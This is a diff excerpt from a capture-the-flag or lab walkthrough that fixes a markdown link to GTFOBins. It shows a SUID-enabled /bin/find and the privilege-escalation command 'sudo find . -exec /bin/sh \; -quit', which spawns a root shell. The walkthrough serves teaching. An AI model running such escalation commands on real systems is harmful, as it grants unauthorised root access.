amandaguglieri/womenhackers/womenhackers-walkthrough.md

 -rwsr-xr-x 1 root root 286184 Jul 14  2021 /bin/find
 ```

 Knowing this, we can escalate privileges.
-(This web provides you with some resources to exploit suid bit)[https://gtfobins.github.io/gtfobins/find/].
+[This web provides you with some resources to exploit suid bit](https://gtfobins.github.io/gtfobins/find/).
 Run:

 ```bash
 sudo find . -exec /bin/sh \; -quit